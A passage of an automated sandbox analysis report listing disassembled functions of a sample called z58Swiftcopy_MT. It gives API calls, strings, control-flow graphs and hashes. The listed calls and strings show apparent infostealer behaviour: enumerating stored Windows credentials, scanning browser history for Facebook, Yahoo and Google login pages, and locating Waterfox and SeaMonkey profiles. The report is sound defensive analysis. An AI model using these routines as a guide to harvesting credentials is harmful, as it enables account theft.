                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                      • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                                      Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                                      • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                      Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: C:\Windows\system32
                                                                                                                                                                                                                                      • API String ID: 669240632-2896066436
                                                                                                                                                                                                                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                      Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 697348961-0
                                                                                                                                                                                                                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-11920434
                                                                                                                                                                                                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
